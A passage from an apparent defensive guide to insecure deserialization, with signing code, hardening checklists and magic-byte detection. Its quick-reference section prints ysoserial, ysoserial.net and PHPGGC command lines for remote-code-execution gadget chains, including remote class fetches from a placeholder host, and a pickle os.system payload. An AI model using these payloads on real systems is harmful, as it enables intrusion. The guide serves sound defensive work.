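import json

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(payload: bytes, key: bytes) -> bytes:
    """Prefix the payload with an HMAC-SHA256 tag."""
    return hmac.new(key, payload, hashlib.sha256).digest() + payload


def open_sealed(blob: bytes, key: bytes) -> bytes:
    """Return the payload only if the tag verifies; raise otherwise."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("bad signature; refusing to deserialize")
    return payload


key = b"demo-key-load-from-a-secret-store"  # placeholder, not a real key
blob = seal(json.dumps({"user": "ada"}).encode(), key)

# Deserialization happens only after verification succeeds.
print(json.loads(open_sealed(blob, key)))
```

The ordering is the point: the deserializer never sees bytes that failed verification. As the caveat in item 2 notes, the guarantee is only as strong as the secrecy of the key.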
Format-specific migration targets#
| From | To |
|---|---|
| Java ObjectInputStream | JSON (Jackson with fixed types, no default typing) or Protobuf |
| PHP unserialize | json_encode / json_decode with explicit fields |
| Python pickle for models | Safetensors for tensors, ONNX for graphs, JSON for metadata |
| Python pickle for IPC | JSON, MessagePack, Protobuf |
| Ruby Marshal | JSON with typed columns, MessagePack, Protobuf |
| .NET BinaryFormatter | System.Text.Json or DataContractSerializer with known types |
| ASP.NET ViewState | Stateless pages, signed tokens, server-side session |
| YAML with types | safe_load / SafeConstructor; never yaml.load (Python pre-5.1) or Yaml().load (SnakeYAML <2.0) |
ML pipeline hardening checklist#
Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:
- Migrate model weights to safetensors wherever possible. Default in HuggingFace transformers since 2022.
- Set torch.load(..., weights_only=True) on every load site. torch.load without this is a code review finding.
- Never call joblib.load on user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted.
- Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
- If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
- Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf. recv_pyobj() is the anti-pattern.
- Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations; LightLLM’s empty-string nonce is the cautionary tale.
- Scan model uploads with ModelScan + Fickling, knowing both have bypasses.
- Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
- Log every model load path. Alert on loads from unexpected origins.
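The “verify before load” and “log every model load path” items can be combined in a small wrapper. The sketch below pins a SHA-256 digest rather than checking a real signature, which is a weaker stand-in chosen to keep the example standard-library only; read_verified and the logger name are hypothetical, and the expected digest is assumed to come from a manifest stored apart from the model files.

```python
import hashlib
import logging

log = logging.getLogger("model_loader")


def read_verified(path, expected_sha256):
    """Return the file's bytes only if its SHA-256 matches the pinned digest."""
    with open(path, "rb") as handle:
        data = handle.read()  # read once; hash and hand out the same bytes
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256.lower():
        log.warning("model digest mismatch: path=%s sha256=%s", path, actual)
        raise ValueError(f"digest mismatch for {path}")
    log.info("model load: path=%s sha256=%s", path, actual)
    return data
```

Returning the verified bytes, instead of re-opening the path later, avoids a window in which the file could be swapped between the check and the load. Large checkpoints would need a streaming variant.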
.NET / SharePoint hardening checklist (post-ToolShell)#
- Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
- Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
- Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
- Restrict ViewState to MAC-validated, encrypted mode.
- Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
- Inventory BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter usages and plan retirement.
- Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
- Monitor w3wp.exe spawning cmd.exe, powershell.exe, certutil.exe.
Java hardening checklist#
- Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
- Inventory and upgrade: commons-collections (>=3.2.2 disables deserialization of the unsafe functors by default; >=4.1 for 4.x), commons-beanutils (>=1.9.4), jackson-databind (latest), xstream (>=1.4.20), snakeyaml (>=2.0), log4j (>=2.17.1).
- Remove Jackson default typing. Never call enableDefaultTyping() or set @JsonTypeInfo(use = Id.CLASS) on untrusted input.
- Disable RMI registry exposure. Do not publish JMX on untrusted networks.
- Retire XMLDecoder for untrusted input entirely.
- Audit any custom readObject, readResolve, readExternal methods in your own code.
- Set up outbound firewall rules from JVM processes: block unexpected JRMP/LDAP traffic.
PHP hardening checklist#
- Replace all unserialize($untrusted) with json_decode($untrusted) where possible.
- Where replacement is infeasible, use unserialize($data, ['allowed_classes' => false]) or a tight allowlist.
- Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
- Audit all file operations for phar:// reachability from user input.
- Store session data using a non-serializing handler or sign cookies.
- Disable unserialize_callback_func.
- Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.
Ruby hardening checklist#
- Replace Marshal.load(untrusted) with JSON parsed against an explicit schema.
- Migrate Rails cache store off :marshal (Rails 7.1+ defaults to :json for some stores; verify).
- Upgrade Ruby to 3.1+ for YAML.load safe default.
- Disable JSON.parse(create_additions: true) and Oj.load default mode.
- Run Trail of Bits’s Semgrep rules in CI: marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization.
- Audit any custom marshal_load / marshal_dump methods.
15. Signature & Gadget Quick Reference#
Magic bytes / payload prefixes#
Java serialized (raw): AC ED 00 05
Java serialized (base64): rO0AB
.NET BinaryFormatter: 00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64): AAEAAAD/////AQAAAA
Python pickle (proto 2): 80 02
Python pickle (proto 4): 80 04
Python pickle (proto 5): 80 05
Ruby Marshal: 04 08
PHP serialized object: O:<digit>+:"
PHP serialized array: a:<digit>+:{
ASP.NET ViewState prefix: /wEP / /wEX / /wET
PHAR stub: <?php __HALT_COMPILER();
SnakeYAML tag prefix: !!javax. / !!org. / !!java.
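A subset of the prefixes above can be turned into a quick triage function for request bodies or files. This is a sketch with made-up names (classify and its labels). Short prefixes such as Ruby's 04 08 and pickle's 80 0x will produce false positives on arbitrary binary data, so treat a hit as a reason to look closer, not as a verdict.

```python
import re

RAW_PREFIXES = [
    (bytes.fromhex("aced0005"), "java-serialized"),
    (bytes.fromhex("0001000000ffffffff"), "dotnet-binaryformatter"),
    (b"\x04\x08", "ruby-marshal"),
]
TEXT_PATTERNS = [
    (re.compile(rb'^O:\d+:"'), "php-object"),
    (re.compile(rb"^a:\d+:\{"), "php-array"),
    (re.compile(rb"^rO0AB"), "java-serialized-b64"),
    (re.compile(rb"^AAEAAAD/////"), "dotnet-binaryformatter-b64"),
]


def classify(body: bytes):
    """Return a label for a recognised serialization prefix, else None."""
    for prefix, label in RAW_PREFIXES:
        if body.startswith(prefix):
            return label
    # Pickle protocols 2 through 5 start with PROTO (0x80) + version byte.
    if len(body) >= 2 and body[0] == 0x80 and 2 <= body[1] <= 5:
        return "python-pickle"
    for pattern, label in TEXT_PATTERNS:
        if pattern.match(body):
            return label
    return None
```

Real traffic often wraps these in further encodings (URL-encoding, gzip, nested base64), so a WAF or proxy rule would normally decode first and then apply the same checks.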
Java ysoserial chain selector#
ysoserial CommonsCollections1 "cmd" # JDK ≤ 8u71 + commons-collections 3.x
ysoserial CommonsCollections5 "cmd" # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd" # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd" # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd" # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd" # hibernate 3.x
ysoserial Jdk7u21 "cmd" # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "host:port" # outbound JRMP
ysoserial URLDNS "http://probe.dns/" # blind probe, no RCE
ysoserial Spring1 "cmd" # older spring-core
ysoserial ROME "cmd" # ROME 1.0
ysoserial MozillaRhino1 "cmd" # mozilla rhino
ysoserial Click1 "cmd" # click framework
ysoserial Clojure "cmd" # clojure 1.x
ysoserial C3P0 "http://host/:Exploit" # c3p0 remote class fetch: base URL, then class name
.NET ysoserial.net gadgets#
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"
PHPGGC chain selector#
phpggc -l laravel # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id # base64 URL-encoded
phpggc --phar=zip Monolog/RCE1 system id -o payload.phar
Python pickle one-liner test#
import pickle, os

class P:
    def __reduce__(self):
        # The returned callable and arguments are invoked on pickle.loads
        return (os.system, ("id",))

payload = pickle.dumps(P())
# Never use this on production systems; defensive validation only
Ruby Marshal gadget family (current canonical)#
Gem::SpecFetcher
└─ Gem::Version
└─ Gem::RequestSet::Lockfile
└─ Gem::RequestSet
└─ Gem::Resolver::SpecSpecification
└─ Gem::Resolver::GitSpecification
└─ Gem::Source::Git
└─ git clone with backtick-injected reference
└─ shell metacharacter expansion → RCE
Magic method hooks by language#
| Language | Hooks fired during / after deserialization |
|---|---|
| Java | readObject, readResolve, readObjectNoData, readExternal, validateObject, custom finalize |
| PHP | __wakeup, __unserialize, __destruct, __toString, __call, __invoke, __get, __set |
| Python (pickle) | Callable returned by __reduce__ / __reduce_ex__ (the methods run at dump time; the callable runs on load), __setstate__, __new__ |
| .NET | [OnDeserializing], [OnDeserialized], ISerializable.GetObjectData, constructor with SerializationInfo, IDeserializationCallback.OnDeserialization |
| Ruby (Marshal) | marshal_load, _load, _dump_data, init_with (YAML), encode_with |
| Node.js | toJSON, any property getters triggered during reconstruction, eval-based schemes via Function strings |
Universal defensive rule of thumb#
If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.
Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, TrailOfBits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.